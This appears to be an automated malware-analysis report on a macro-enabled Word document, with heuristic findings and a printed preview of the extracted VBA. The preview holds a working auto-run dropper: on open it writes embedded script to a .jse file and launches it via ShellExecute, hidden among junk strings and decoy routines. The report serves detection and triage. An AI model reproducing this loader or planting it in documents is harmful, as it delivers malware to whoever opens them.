Verdict: MALICIOUS (Risk Score: 218)

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic; T1566.001 Spearphishing Attachment
The sample is a macro-enabled Word document containing obfuscated VBA code. The `Document_Open` macro is present and triggers the execution of this code, which utilizes `CreateObject` and appears to be designed to download and execute a second-stage payload. The presence of `CreateObject` and the obfuscated nature of the auto-exec loader strongly suggest malicious intent.
Heuristics (8)

- VBA project inside OOXML (medium; 5 related findings) [OOXML_VBA]: Document contains a VBA project (VBA macros present).
- Obfuscated auto-exec VBA loader (critical) [OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Set tryToRun = CreateObject(Mid(Collect.WhatDo.Caption, 14, 17))` / `Dim NN65bU As String`
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call. Matched line in script: `Set tryToRun = CreateObject(Mid(Collect.WhatDo.Caption, 14, 17))` / `Dim NN65bU As String`
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low) [OLE_VBA_DOCOPEN]: Document_Open macro. Matched line in script: `Private Sub Document_Open()` / `Load Collect`
- Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]: Environ() call (env variable access). Matched line in script: `Dim folderP As String` / `folderP = Environ(Collect.Where)` / `folderP = folderP & "\" & Rnd`
- Suspicious extracted artifact (high) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All extracted URLs on this sample were labelled "In document text (OOXML body / shared strings)".
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5584 bytes | eb4ff09653e995856f14d8177ff8bb144870b89501e1e4fe41f869414d163c31 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub SearchForBorders1()
Dim k As Word.Paragraph
Dim bFound As Boolean
For Each k In ActiveDocument.Paragraphs
bFound = False
If k.Borders(wdBorderTop).LineStyle <> wdLineStyleNone _
Then bFound = True
If k.Borders(wdBorderLeft).LineStyle <> wdLineStyleNone _
Then bFound = True
If k.Borders(wdBorderBottom).LineStyle <> wdLineStyleNone _
Then bFound = True
If k.Borders(wdBorderRight).LineStyle <> wdLineStyleNone _
Then bFound = True
Dim lXR3G75N As Long
lXR3G75N = 4997713
Dim N7M66689Ca As Long
N7M66689Ca = 41726
Dim ojL5B As Long
If bFound Then
k.Range.Select
Exit Sub
End If
Next k
End Sub
Private Sub Document_Open()
Load Collect
Dim someStr As String
someStr = Collect.HowName.Text
Dim rs58jMs95K3 As String
rs58jMs95K3 = "very each winter climate completely pleasure till want flower gravity waste catch heart usual stepped figure event wherever safety them act worse here also tone ourselves song giant solve active beauty missing him wrote finally knowledge feathers actually dropped liquid magic fifty unknown clean principal second those stepped arrangement poetry grew become gate down coal person result mysterious string consider scale becoming likely except blind sum pass rain ocean wear thy member milk border personal flight hide individual planet expression provide lake hollow happen position being captured learn chemical thought exchange recognize plane shore duty running ask pay term piece climb order trail step orbit present action dear zulu sick corner except immediately quick regular"
Set tryToRun = CreateObject(Mid(Collect.WhatDo.Caption, 14, 17))
Dim NN65bU As String
NN65bU = "unhappy length adventure jar war grain loud idea properly suddenly military snake naturally deeply transportation supply mix idea second explanation student ago married further through difficulty possibly kept meal aid safe feet pictured kept tax lonely terrible sleep iron scene hurry bag imagine early myself concerned empty worker wish one ought valley vapor hair cream shore copper mix value breathe better refused tiny happened complex very grandfather composition plant sport mile divide leader want clear enter muscle secret visit vote mud struggle western shinning cent chain due pan story who uncle forest front limited class bean fifty subject scene pipe beneath closer level eight quick flight upon than never according rising"
tryToRun.ShellExecute (someStr)
Set tryToRun = Nothing
End Sub
Sub SearchForBorders2()
Static a As Long, l As Long
Dim b As Boolean
Dim bd As Border
Dim bds As Borders
Dim prg As Paragraph
Dim prgs As Paragraphs
Dim re As Range
Dim se As Selection
Dim doc As Word.Document
ojL5B = 71135
Dim Pl2RJWEbY63l As Long
Pl2RJWEbY63l = 454
Dim tAi9bmTOgWNo As Long
tAi9bmTOgWNo = 2967
Set se = Selection
Set re = se.Range
Set doc = ActiveDocument
If se.Start < l Then a = se.Start
With doc.Content
Set bds = .Borders
re.Start = a
re.End = .End
End With
For Each bd In bds
b = bd = True
If b Then Exit For
Next
If Not b Then Exit Sub
Set prgs = re.Paragraphs
For Each prg In prgs
Set re = prg.Range
If InStr(re.Text, Chr(13)) = 0 Then
re.End = re.End + 1
End If
Set bds = re.Borders
For Each bd In bds
b = bd = True
If b Then Exit For
Next
If b Then
a = re.Start
se.Start = re.Start
se.End = re.Start
a = re.End
l = se.Start
Exit Sub
End If
Next
a = 0
MsgBox "No more borders found"
End Sub
Sub TransposeParagraphs()
Selection.MoveUp Unit:=wdParagraph, _
Count:=1, Extend:=wdExtend
Selection.MoveLeft Unit:=wdCharacter, Count:=1
Selection.MoveDown Unit:=wdParagraph, _
Count:=1, Extend:=wdExtend
Selection.Range.Cut
Selection.MoveDown Unit:=wdParagraph, Count:=1
Selection.Range.Paste
End Sub
Attribute VB_Name = "NewMacros"
Sub d()
End Sub
Attribute VB_Name = "Collect"
Attribute VB_Base = "0{09A65737-1974-4A42-9D02-BEE352E0B45B}{1195DADB-125B-4FEF-9AA6-683FB293A7E2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
Randomize
Dim strData As String
strData = Data.DataText.Caption
Dim folderP As String
folderP = Environ(Collect.Where)
folderP = folderP & "\" & Rnd
folderP = folderP & ".jse"
Collect.HowName.Text = folderP
Open folderP For Output As #5
Print #5, strData
Close #5
End Sub
Attribute VB_Name = "Data"
Attribute VB_Base = "0{7DA87B00-2474-4B41-822B-B4FEED49323A}{5438B97E-06D6-4A75-8A07-F7811BE6010C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 60928 bytes | c1cea542cbac4ac4e62afe9755b84b1cbe06dd9a8ed8fb90592d45e6cad95043 |
Detection

- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 5 long base64-like blob(s).